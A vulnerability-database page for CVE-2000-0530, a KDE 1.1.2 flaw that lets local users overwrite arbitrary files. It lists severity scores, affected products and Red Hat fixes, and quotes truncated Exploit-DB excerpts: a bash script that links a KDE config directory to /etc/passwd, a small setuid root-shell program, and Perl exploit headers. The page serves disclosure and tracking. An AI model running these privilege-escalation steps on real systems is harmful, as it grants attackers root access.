CVE-2000-0530
published 2000-05-31CVE-2000-0530: The KApplication class in the KDE 1.1.2 configuration file management capability allows local users to overwrite arbitrary files.
PriorityP421high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
1.18%
63.8th percentile
The KApplication class in the KDE 1.1.2 configuration file management capability allows local users to overwrite arbitrary files.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| caldera | openlinux | — | — |
| kde | kde | — | — |
CVSS provenance
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
vendor_redhat7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-wvff-22g3-f295: The KApplication class in the KDE 1
ghsa_unreviewed·2022-05-03
CVE-2000-0530 [HIGH] GHSA-wvff-22g3-f295: The KApplication class in the KDE 1
The KApplication class in the KDE 1.1.2 configuration file management capability allows local users to overwrite arbitrary files.
Red Hat
security flaw
vendor_redhat·2000-05-31·CVSS 7.2
CVE-2000-0530 [HIGH] security flaw
security flaw
The KApplication class in the KDE 1.1.2 configuration file management capability allows local users to overwrite arbitrary files.
Statement: This issue was fixed in the following products:
- Red Hat Powertools 6.0 - RHSA-2000:032 (2000-06-07)
- Red Hat Powertools 6.1 - RHSA-2000:032 (2000-06-07)
- Red Hat Powertools 6.2 - RHSA-2000:032 (2000-06-07)
No detection rules found.
Exploit-DB
KDE 1.1.2 KApplication configfile - Local Privilege Escalation (3)
exploitdb·2000-05-31
CVE-2000-0530 KDE 1.1.2 KApplication configfile - Local Privilege Escalation (3)
KDE 1.1.2 KApplication configfile - Local Privilege Escalation (3)
---
#source: https://www.securityfocus.com/bid/1291/info
#
#The KDE configuration-file management has a bug which could result in root compromise.
#
#Due to insecure creation of configuration (rc) files via KApplication-class, local users can modify ownership of arbitrary files when running setuid root KDE-programs.
#
#Properly exploited, this can permit a local attacker to change ownership of key system files, then write arbitrary data to them, allowing an elevation of privileges.
#!/bin/bash
link=/home/paul/.kde/share/config
linkto=/etc/passwd
target=/opt/kde/bin/ktvision
echo ""
echo "KTVision >sush.c
#include
main()
{
setuid(geteuid());
setgid(getegid());
execl("/bin/bash", "/bin/bash", NULL);
}
__DUPA__
echo " c
Exploit-DB
KDE 1.1.2 KApplication configfile - Local Privilege Escalation (2)
exploitdb·2000-05-31
CVE-2000-0530 KDE 1.1.2 KApplication configfile - Local Privilege Escalation (2)
KDE 1.1.2 KApplication configfile - Local Privilege Escalation (2)
---
#source: https://www.securityfocus.com/bid/1291/info
#
#The KDE configuration-file management has a bug which could result in root compromise.
#
#Due to insecure creation of configuration (rc) files via KApplication-class, local users can modify ownership of arbitrary files when running setuid root KDE-programs.
#
#Properly exploited, this can permit a local attacker to change ownership of key system files, then write arbitrary data to them, allowing an elevation of privileges.
#!/usr/bin/perl
#
# 7350ktuner! The ktuner-hack.
# (a.k.a. kil3r for some reason :)
#
# Just execute. Gives instant rootshell kiddie!
# If only ktuner is setuid-root and vulnerable as with
# SuSE 6.4!
#
# When has this stupid race an end?
#
#
Exploit-DB
KDE 1.1.2 KApplication configfile - Local Privilege Escalation (1)
exploitdb·2000-05-31
CVE-2000-0530 KDE 1.1.2 KApplication configfile - Local Privilege Escalation (1)
KDE 1.1.2 KApplication configfile - Local Privilege Escalation (1)
---
#source: https://www.securityfocus.com/bid/1291/info
#
#The KDE configuration-file management has a bug which could result in root compromise.
#
#Due to insecure creation of configuration (rc) files via KApplication-class, local users can modify ownership of arbitrary files when running setuid root KDE-programs.
#
#Properly exploited, this can permit a local attacker to change ownership of key system files, then write arbitrary data to them, allowing an elevation of privileges.
#!/usr/bin/perl
#
# 7350ktvision! The ktvision-hack.
#
# Just execute. Gives instant rootshell kiddie!
# If only ktvision is setuid-root and vulnerable as with
# SuSE 6.4!
#
#
# Bugdiscovery is due to Sebastian Krahmer.
# http://www.cs.uni-po
ftp://ftp.calderasystems.com/pub/OpenLinux/security/CSSA-2000-015.0.txthttp://archives.neohapsis.com/archives/bugtraq/2000-05/0387.htmlhttp://www.redhat.com/support/errata/RHSA-2000-032.htmlhttp://www.securityfocus.com/bid/1291https://exchange.xforce.ibmcloud.com/vulnerabilities/4583ftp://ftp.calderasystems.com/pub/OpenLinux/security/CSSA-2000-015.0.txthttp://archives.neohapsis.com/archives/bugtraq/2000-05/0387.htmlhttp://www.redhat.com/support/errata/RHSA-2000-032.htmlhttp://www.securityfocus.com/bid/1291https://exchange.xforce.ibmcloud.com/vulnerabilities/4583
2000-05-31
Published